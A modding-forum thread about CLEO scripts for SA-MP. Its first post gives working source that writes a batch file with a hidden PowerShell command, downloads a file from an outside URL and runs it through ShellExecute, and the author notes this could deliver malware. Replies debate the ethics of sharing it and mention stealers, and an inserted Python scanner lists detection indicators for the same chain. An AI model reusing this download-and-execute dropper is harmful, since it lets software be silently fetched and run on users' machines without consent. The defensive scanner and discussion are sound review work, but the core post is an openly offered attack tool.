[Presentation] Command line functionality

monday

#1
The code below creates and executes a batch file with instructions to download an image and execute it immediately. The interesting part is that it could also be used for any other application, like malware for example, or to do some damage to the PC directly from the command line.

Tested with:
-Cleo 4.1
-Sampfuncs 5.3.1
-Samp 0.3.7


Code:
/*
The code seems more complex than the actual working mechanism because of the "wooden" string handling. It seems that the "0A9E: writefile" opcode doesn't work if a string pointer is used, so the string is cut and written to the file step by step. Also it seems that using too long strings causes the code to ignore them, so that's why there are multiple "@write_file" calls instead of one with a single long string.
*/

{$CLEO .cs}
0000: NOP

// NOTE (editor): the forum's e-mail obfuscation replaced every local variable
// (0@, 1@, ...) in the posted source with "[email protected]". The variable numbering
// below is reconstructed from the data flow and is an assumption; the opcodes,
// the strings and the control flow are the author's.

repeat
wait 50
until 0AFA: is_samp_structures_available

0A9A: 0@ = openfile "file.bat" mode "wt+"  // IF and SET

alloc 1@ 500
format 1@ "powershell.exe -nop -w hidden -c $down = New-Object System.Net.WebClient; $url = 'http:/" //part of the link
call @write_file 2 file 0@ string 1@
format 1@ "/motherboard-images.vice.com/content-images/article/20733/1428578997900669.jpg'; " //link
call @write_file 2 file 0@ string 1@
format 1@ "$file = 'pic.jpg'; $down.DownloadFile($url,$file); "  // 'pic.jpg' is the name the file will have when saved
call @write_file 2 file 0@ string 1@
format 1@ "$exec = New-Object -com shell.application; $exec.shellexecute($file); exit;"  //executes the file
call @write_file 2 file 0@ string 1@

0A9B: closefile 0@
0AC9: free_allocated_memory 1@

//by springfield
0AA2: 2@ = "shell32.dll"
if 0AA4: 3@ = "ShellExecuteA" 2@
then
   // parameters are listed last-to-first: ShellExecuteA(hwnd=0, lpOperation=0, lpFile="file.bat", lpParameters=0, lpDirectory=0, nShowCmd=1)
   0AA7: 3@ push 6 pop 1 params 1 0 0 "file.bat" 0 0 error_code 4@
   if 4@ <= 32   // ShellExecute returns a value greater than 32 on success
   then
   printf "FAILURE: %d" 1000 4@
   end
end
//by springfield


0A93: end_custom_thread


:write_file
// params: 0@ = file handle, 1@ = pointer to the string to write
0C17: 2@ = strlen 1@
alloc 3@ 150   // 16-byte chunk buffer
alloc 4@ 150   // copy of the chunk for the debug echo in chat

while 2@ >= 16
    wait 0
    0C24: strncpy destination 3@ source 1@ size 16   // no terminator is copied; assumes the fresh buffer is zero past byte 16

    format 4@ "%s" 3@
    chatmsg "%s %d" -1 4@ 2@   // debug: echo the chunk and the remaining length
    0A9E: writefile 0@ size 16 from 3@

    1@ += 16
    0C17: 2@ = strlen 1@
end

if 2@ > 0   // remainder shorter than 16 bytes
then
    format 4@ "%s" 1@
    chatmsg "%s %d" -1 4@ 2@
    0A9E: writefile 0@ size 2@ from 1@
end

0AC9: free_allocated_memory 3@
0AC9: free_allocated_memory 4@
ret 0
 
monday

#8
Guys, I really believe it could have a positive impact; I'll try to justify it when I defeat the alcohol (max 4 days ;p). Please don't delete, thanks.
 

0x688

#9
I already made a mod to protect users against this and more; it needs some refining, then I'll probably release it open source as well.
 

mistery

#11
Yes, but who will try a CLEO which has "open .bat" and "http://.." inside, lol...
Anyway, time to find a good decrypter :} if you know what I mean.
 

springfield

#12
I don't see the point in thinking this is dangerous.

We have known for some years that 'stealers' and keyloggers exist in CLEO (there are actually some sources posted on this forum, HERE); they would steal passwords from sa-mp dialogs, PINs from textdraws etc.

I doubt that anybody (mostly Russians) who tangled with such things, considering they were using Win APIs like InternetConnect, HttpSendRequest etc., didn't think of using the exact same thing as here to download/run/install some kind of malware.

CLEOs that are posted in the RELEASE section are usually decrypted (if needed) and manually checked before being approved.
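Editor's added example (not code from this thread or from any poster): a small static scanner for the indicators a reviewer would look for in a decrypted .cs before approving it. It covers the chain from the first post (a .bat opened for writing, the hidden powershell download cradle, shell32!ShellExecuteA resolved and called) and the wininet imports (InternetConnect, HttpSendRequest) that post #12 says the old stealers used. The sample blobs are constructed stand-ins for compiled scripts with placeholder opcode bytes and a dummy host name; the indicator weights and the review threshold are this example's own choices, not a standard.

```python
"""Indicator scan for CLEO .cs files (editor's added example, not thread code).

Unless the script was encrypted, a compiled .cs keeps the string arguments of
its opcodes (file names, DLL/export names, the powershell command line) as
plain bytes, so a `strings`-style pass already surfaces the pattern from the
first post. Post #12's wininet imports are covered by the same table.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Indicator table. The names come from the thread; the weights are this
# example's own choices. Each indicator counts once, however often it matches.
INDICATORS: dict[str, tuple[re.Pattern[bytes], int]] = {
    "batch_file":      (re.compile(rb"\.bat\b", re.I), 2),
    "powershell":      (re.compile(rb"powershell(?:\.exe)?", re.I), 3),
    "hidden_window":   (re.compile(rb"-nop\b|-w(?:indowstyle)?\s+hidden", re.I), 2),
    "download_cradle": (re.compile(rb"WebClient|DownloadFile|DownloadString", re.I), 3),
    "shellexecute":    (re.compile(rb"ShellExecute(?:Ex)?[AW]?|shell\.application", re.I), 3),
    "shell32":         (re.compile(rb"shell32\.dll", re.I), 1),
    "wininet":         (re.compile(rb"wininet\.dll|Internet(?:Open|Connect)[AW]?|HttpSendRequest[AW]?", re.I), 4),
    # "http:/" on purpose: the first post splits the URL over two format
    # strings, so the second slash may sit in a different string argument.
    "url":             (re.compile(rb"https?:/", re.I), 1),
}
REVIEW_SCORE = 4  # at or above this the file goes to manual review

_PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")


def extract_strings(blob: bytes) -> list[str]:
    """Printable-ASCII runs of 4+ bytes, like the `strings` tool."""
    return [m.group().decode("ascii") for m in _PRINTABLE_RUN.finditer(blob)]


@dataclass
class ScanResult:
    score: int = 0
    hits: dict[str, list[str]] = field(default_factory=dict)

    @property
    def needs_review(self) -> bool:
        return self.score >= REVIEW_SCORE


def scan_blob(blob: bytes) -> ScanResult:
    """Score a raw .cs (or any) blob against the indicator table."""
    result = ScanResult()
    for name, (pattern, weight) in INDICATORS.items():
        found = sorted({m.group().decode("ascii", "replace") for m in pattern.finditer(blob)})
        if found:
            result.hits[name] = found
            result.score += weight
    return result


def report(result: ScanResult) -> str:
    lines = [f"score={result.score} verdict={'REVIEW' if result.needs_review else 'clean'}"]
    lines += [f"  {name}: {', '.join(found)}" for name, found in result.hits.items()]
    return "\n".join(lines)


# Constructed samples standing in for compiled .cs files: the opcode/length
# bytes are placeholders, only the string arguments matter to the scan, and
# the host name is a dummy rather than the URL from the first post.
DROPPER_BLOB = (
    b"\x9a\x0a\x03\x00" b"file.bat\x00" b"wt+\x00"
    b"\xd3\x0a\x03\x01" b"powershell.exe -nop -w hidden -c $down = New-Object System.Net.WebClient; $url = 'http:/\x00"
    b"\xd3\x0a\x03\x01" b"/dl.example.invalid/pic.jpg'; $file = 'pic.jpg'; $down.DownloadFile($url,$file); \x00"
    b"\xd3\x0a\x03\x01" b"$exec = New-Object -com shell.application; $exec.shellexecute($file); exit;\x00"
    b"\xa2\x0a\x03\x02" b"shell32.dll\x00"
    b"\xa4\x0a\x03\x03" b"ShellExecuteA\x00" b"\x03\x02"
)
STEALER_BLOB = (  # the wininet pattern described in #12
    b"\xa2\x0a\x03\x00" b"wininet.dll\x00"
    b"\xa4\x0a\x03\x01" b"InternetConnectA\x00"
    b"\xa4\x0a\x03\x02" b"HttpSendRequestA\x00"
)
BENIGN_BLOB = b"\xfa\x0a\x00" b"\xd3\x0a\x03\x01" b"Speed: %d km/h\x00"

if __name__ == "__main__":
    for label, blob in (("dropper", DROPPER_BLOB), ("stealer", STEALER_BLOB), ("benign", BENIGN_BLOB)):
        print(label)
        print(report(scan_blob(blob)))
```

Two caveats a reviewer needs: an encrypted .cs hides all of these strings, so decrypt first (the manual check described in #12 assumes exactly that), and a script that assembles its strings at runtime instead of storing them (format with %c, byte-wise writes) will not trip a string scan. This is a triage aid that says what to read, not a verdict.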
 

MrChristmas

#13
+ These days most users can decrypt most CLEOs by themselves and see whether they are safe to use or not.
 

PlasticBottle

#14
Yeah, we can decrypt shit and everything, but it's not the case for "X_h4x0r1337_X" who comes here for the first time to download random shit (even though CLEOs in Release are safe).
 
monday

#15
@PlasticBottle @Opcode.eXe @Forever15
Sharing this has some nasty potential, but there's also a positive side to it. Tools like that are some sort of power. They are equivalent to real-life tools like a gun or big muscle mass. While both can be used for immoral reasons, their general positive contribution shouldn't be neglected. I'd compare sharing this code with sharing a protein powder or sharing a tutorial on how to make a homemade gun for self-defence/counter-attack.

Personally I never considered using any kind of power for unprovoked abuse or malicious purposes, and I think there are a lot of people like that, who squander as much power as they can throughout their life hoping that someday, in a dangerous situation, it can be used for protection, protection even by means of some sort of counter-attack, which would require power like a gun, physical strength or offensive software.
 

PlasticBottle

#16
I guess you are right, and also nowadays there isn't as much malware as, like, 3 years ago. Even though we have powerful antiviruses etc., sharing this can be bad. It's like a double-edged sword; we will see how it turns out...
 